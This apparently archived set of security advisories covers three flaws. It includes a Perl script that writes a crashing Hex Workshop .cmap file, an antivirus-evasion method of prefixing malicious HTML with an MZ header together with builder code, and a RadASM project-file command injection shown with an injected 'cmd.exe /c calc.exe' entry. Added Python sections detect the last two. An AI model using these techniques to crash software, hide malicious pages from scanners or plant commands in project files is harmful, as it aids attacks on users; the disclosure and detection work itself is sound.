Hex Workshop v6 ColorMap files .cmap Invalid Memory Reference crash POC

2009-02-03 Thread xhakerman2006
#!/usr/bin/perl -w

# Hex Workshop v6 ColorMap files .cmap Invalid Memory Reference crash POC
# Discovered by : DATA_SNIPER
# for more information visit my blog: http://datasniper.arab4services.net/
#
# The exploit is very hard to implement; if we can make the reference
# point to a valid memory location containing a unicode string we can
# corrupt the memory and get code execution (it's not so easy, as you
# can see; try it manually in olly).

use strict;

print "=" x 60, "\n";
print "Hex Workshop v6 (ColorMap files .cmap) Invalid Memory Reference crash POC\n";
print "Discovered by DATA_SNIPER\n";
print "Greetz to: arab4services team and AT4RE Team\n";
print "=" x 60, "\n";

# the '%s' in the colour definition is what triggers the invalid memory
# reference when Hex Workshop loads the ColorMap file
my $crash = '#Simple POC by DATA_SNIPER' . "\n" . '%s= RGB(0, 0, 0)';  # don't worry about it, it's not a format string bug :)

my $file = "cr4sh.cmap";

# open the output file for writing and drop the crash data into it
open(my $data, '>', $file) or die "Cannot open $file: $!";
print $data $crash;
close($data);

print "$file has been created\n";
print "open it in HexWorkshop.\n";


Multiple Vendor Anti-Virus Software Malicious WebPage Detection Bypass -Update-

2008-12-09 Thread xhakerman2006
Little update.

In the previous advisory there were some wrong reports because of updates to the 
anti-virus product versions.



Multiple Vendor Anti-Virus Software Malicious WebPage Detection Bypass

   [_] Discovered by : DATA_SNIPER

   [_] Greets to:  hacker cc Team , Arab4Services team on 
www.arab4services.net , AT4RE Team on www.at4re.com

   [_] Special thanks go to: Andrey Bayora and all Arabian hackers, 
especially Algerian hackers.

NOTIFICATION:

This exploit is based on Andrey Bayora's "magic of magic byte" but with some 
development.

This proof of concept was created for educational purposes only. Use the code 
at your own risk.

The author will not be responsible for any damages.

*

Exploit Information:

Date: 2008/19/08

Impact: Bypassing the detection of a malicious web page that can compromise 
a user's system

Vulnerable AV software (engine and version as reported by VirusTotal):

   ESET Smart Security   Latest Version (the exploit was dedicated for it)
   AhnLab-V3             2008.12.4.1
   AntiVir               7.9.0.36 (2008.12.04)
   Avast                 4.8.1281.0
   CAT-QuickHeal         10.00
   ClamAV                0.94.1
   DrWeb                 4.44.0.09170
   Ewido                 4.0
   Ikarus                T3.1.1.45.0
   K7AntiVirus           7.10.541
   NOD32                 3662
   Norman                5.80.02
   Panda                 9.0.0.4
   Prevx1                V2
   Rising                21.06.31.00
   SecureWeb-Gateway
   Sunbelt               3.1.1832.2
   TheHacker             6.3.1.2.174
   TrendMicro            8.700.0.1004
   ViRobot               2008.12.4.1499

One thing that must be considered is that the POC varies from exploit to 
exploit (sometimes Kaspersky and the other well-known AV software can be 
deceived as well).

Proof Of Concept:

As I said, the exploit is based on the "magic of magic byte" method. We will 
first add the MZ header to the HTML exploit and change the extension to txt 
or jpg or no extension. The exploit is compatible with IE6 and IE7 because 
IE6/7 execute the HTML even if it's in a txt file or a file with no extension.

So the exploit works in cooperation with IE6/7 :).

VirusTotal result of the MS Internet Explorer 6/7 (XML Core Services) Remote Code 
Execution Exploit:

http://www.virustotal.com/analisis/2fce2b49876e27b4144fd39be466200e

and screenshots of the scan in VirusTotal:

http://members.lycos.co.uk/datasniper/a.jpg

http://members.lycos.co.uk/datasniper/b.jpg

http://members.lycos.co.uk/datasniper/c.jpg

POC:

1-add the MZ header to the HTML file:

MZ ... (the binary bytes of a standard DOS header and stub, followed by:) 
...This program cannot be run in DOS mode.

you can put other EXE info in the HTML body for more deception.

2-rename the HTML to a file with no extension, or to txt or jpg.

3-upload it to the webserver:

http://localhost/mallpage.txt or http://localhost/mallpage (no extension).

video POC:

A simple video explaining how the vulnerability can be exploited under ESET Smart 
Security (Arabic).

--
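The MZ-prefixing trick from the three POC steps, together with the check a scanner or web gateway can apply against it, as an added example that is not part of the original post and not DATA_SNIPER's code. The HTML body is a constructed harmless placeholder standing in for the malicious page (not the XML Core Services exploit); the header builder and the classification rules are this example's own assumptions, not any vendor's detection logic.

```python
"""Added example (not DATA_SNIPER's code): build a "magic byte" evasion file of
the kind described in the post, then apply the check that catches it.  The HTML
body is a constructed placeholder, not the XML Core Services exploit."""
import struct

# Constructed HTML body standing in for the malicious page (assumption).
HTML_BODY = b"<html><body><script>alert('sniffed as html')</script></body></html>\r\n"

DOS_STUB_TEXT = b"This program cannot be run in DOS mode.\r\n$"


def fake_mz_header(e_lfanew=0x80):
    """64-byte IMAGE_DOS_HEADER plus the familiar DOS stub text.

    Only e_magic ('MZ') and e_lfanew (offset 0x3C) matter to most format
    sniffers; the rest is zero-filled.  This is the kind of header the post
    prepends to an HTML file so that an engine treats it as a PE."""
    hdr = bytearray(64)
    hdr[0:2] = b"MZ"
    struct.pack_into("<I", hdr, 0x3C, e_lfanew)
    return bytes(hdr) + DOS_STUB_TEXT


def build_evasion_file(html=HTML_BODY):
    """Step 1 of the post: MZ header + DOS stub text + the HTML page."""
    return fake_mz_header() + html


def is_valid_pe(data):
    """True only if a PE signature sits where e_lfanew says it should."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    return e_lfanew + 4 <= len(data) and data[e_lfanew:e_lfanew + 4] == b"PE\0\0"


HTML_MARKERS = (b"<html", b"<script", b"<body", b"<iframe", b"<object")


def looks_like_html(data):
    lowered = data.lower()
    return any(marker in lowered for marker in HTML_MARKERS)


def classify(data):
    """Defensive check: never trust the 'MZ' magic on its own.

    A file that starts with MZ, has no PE header at e_lfanew and contains HTML
    markup is exactly the evasion described in the post: an engine that stops
    at the magic bytes scans it as an executable (and finds nothing) while the
    browser sniffs the content and renders the HTML."""
    if data[:2] == b"MZ":
        if is_valid_pe(data):
            return "pe"
        if looks_like_html(data):
            return "html_with_bogus_mz"
        return "mz_without_pe"
    if looks_like_html(data):
        return "html"
    return "other"


def minimal_pe_like(e_lfanew=0x80):
    """Constructed MZ header whose e_lfanew really points at 'PE\\0\\0'
    (enough to satisfy is_valid_pe; not a loadable image)."""
    head = fake_mz_header(e_lfanew)
    pad = max(0, e_lfanew - len(head))
    return head + b"\0" * pad + b"PE\0\0" + b"\0" * 20


if __name__ == "__main__":
    sample = build_evasion_file()
    with open("mallpage.txt", "wb") as f:  # step 2: a non-executable extension
        f.write(sample)
    print("wrote mallpage.txt, classified as:", classify(sample))
```

The check belongs in the scanner or gateway rather than the client: the browser-side content sniffing that makes a `.txt` or extensionless file render as HTML is the very thing the bypass relies on, and it was only later that IE8 added the `X-Content-Type-Options: nosniff` response header to switch it off.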


RadAsm <=2.2.1.5 Local Command Execution

2008-12-08 Thread xhakerman2006
--

Vulnerability discovered by DATA_SNIPER.

Bug discovered on 25/11/2008.

Affected versions: All versions

Greetz go to: www.at4re.com (Arab Team 4 Reverse Engineering), arab4services.net

Criticality: Highly critical

Impact: Command Execution

--

This is a little POC that can execute an arbitrary command on the victim's machine.

In an unexpected way, the attacker can put a command in the project (.rap) file 
instead of the linker path or the Macro Assembler ML.exe path.

The project file looks like this (some data has been cut to make it readable):

-

project file structure

[Project]
Assembler=masm
Type=Win32 App
...data

[Files]
1=file.Asm
...data

[MakeFiles]
5=CRC Check.exe

[MakeDef]
Menu=1,1,1,1,1,1,1,1,0,0,0,0,0,0,0,0
1=4,O,$B\RC.EXE /v,1   <== Command Execution by replacing the original file path with the command
2=3,O,$B\ML.EXE /c /coff /Cp /nologo /I$I,2   <== Command Execution by replacing the original file path with the command
3=5,O,$B\LINK.EXE /SUBSYSTEM:WINDOWS /RELEASE /VERSION:4.0 /LIBPATH:$L /OUT:$5,3,4   <== Command Execution by replacing the original file path with the command
4=0,0,,5
5=rsrc.obj,O,$B\CVTRES.EXE,rsrc.res   <== Command Execution by replacing the original file path with the command
7=0,0,$E\OllyDbg,5
6=*.obj,O,$B\ML.EXE /c /coff /Cp /nologo /I$I,*.asm
11=4,O,$B\RC.EXE /v,1   <== Command Execution by replacing the original file path with the command
12=3,O,$B\ML.EXE /c /coff /Cp /Zi /nologo /I$I,2   <== Command Execution by replacing the original file path with the command
13=5,O,$B\LINK.EXE /SUBSYSTEM:WINDOWS /DEBUG /VERSION:4.0 /LIBPATH:$L /OUT:$5,3,4   <== Command Execution by replacing the original file path with the command
...data

[Resource]
...data and more data.

--

As you see, "<== Command Execution by replacing the original file name with the 
command" means that this type of data in the project can be exploited for command 
execution by malicious people.

And when the user tries to compile the project, they will face the issue of a 
bad command being executed on their operating system.
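A checker for the [MakeDef] entries the post describes, as an added example; it is not DATA_SNIPER's code and not part of RadASM. The project text is constructed from the structure shown above, with one entry's linker path replaced by an arbitrary command the way the post suggests. The `$X\` path-placeholder pattern and the set of expected tools under `$B` are this example's assumptions about the RadASM layout, not validation that RadASM itself performs.

```python
"""Added example (not DATA_SNIPER's code, not part of RadASM): parse the
[MakeDef] section of a RadASM .rap project file and flag build steps whose
command does not point at an expected tool path."""
import configparser
import re

# Constructed .rap fragment (assumption): the stock MASM steps from the post,
# plus entry 13 whose LINK.EXE path has been replaced with an arbitrary command.
SAMPLE_RAP = r"""[Project]
Assembler=masm
Type=Win32 App

[Files]
1=file.Asm

[MakeFiles]
5=CRC Check.exe

[MakeDef]
Menu=1,1,1,1,1,1,1,1,0,0,0,0,0,0,0,0
1=4,O,$B\RC.EXE /v,1
2=3,O,$B\ML.EXE /c /coff /Cp /nologo /I$I,2
3=5,O,$B\LINK.EXE /SUBSYSTEM:WINDOWS /RELEASE /VERSION:4.0 /LIBPATH:$L /OUT:$5,3,4
4=0,0,,5
5=rsrc.obj,O,$B\CVTRES.EXE,rsrc.res
7=0,0,$E\OllyDbg,5
13=5,O,cmd.exe /c calc.exe,3,4
"""

# Tools a MASM project is expected to run from the $B (bin) directory (assumption).
EXPECTED_TOOLS = {"RC.EXE", "ML.EXE", "LINK.EXE", "CVTRES.EXE"}
# RadASM substitutes $B, $E, ... with configured directories; a real tool path
# in a project file should start with one of them (assumption).
PATH_PLACEHOLDER = re.compile(r"^\$[A-Z]\\")


def parse_makedef(rap_text):
    """Return {step number: command line} for the numbered [MakeDef] entries.

    Each entry reads N=output,O,command,inputs...; the third comma-separated
    field is the command RadASM runs when the project is built."""
    cp = configparser.ConfigParser(interpolation=None)
    cp.read_string(rap_text)
    steps = {}
    for key, value in cp["MakeDef"].items():
        if not key.isdigit():
            continue  # 'Menu' and similar keys are not build steps
        fields = value.split(",")
        if len(fields) < 3:
            continue
        steps[int(key)] = fields[2].strip()
    return steps


def audit_makedef(rap_text):
    """Return (step, command, reason) for every step that would run something
    other than a tool under a RadASM path placeholder.  Empty commands (as in
    step 4) are skipped."""
    findings = []
    for step, cmd in sorted(parse_makedef(rap_text).items()):
        if not cmd:
            continue
        exe = cmd.split()[0]
        if not PATH_PLACEHOLDER.match(exe):
            findings.append((step, cmd, "command is not under a RadASM path placeholder"))
            continue
        tool = exe.split("\\")[-1].upper()
        if exe.startswith("$B\\") and tool not in EXPECTED_TOOLS:
            findings.append((step, cmd, "unexpected tool under $B"))
    return findings


if __name__ == "__main__":
    for step, cmd, reason in audit_makedef(SAMPLE_RAP):
        print(f"[MakeDef] step {step}: {reason}: {cmd}")
```

Run the audit before opening a project that came from someone else; the finding for step 13 is the replaced linker path, which RadASM would otherwise run unquestioningly at build time.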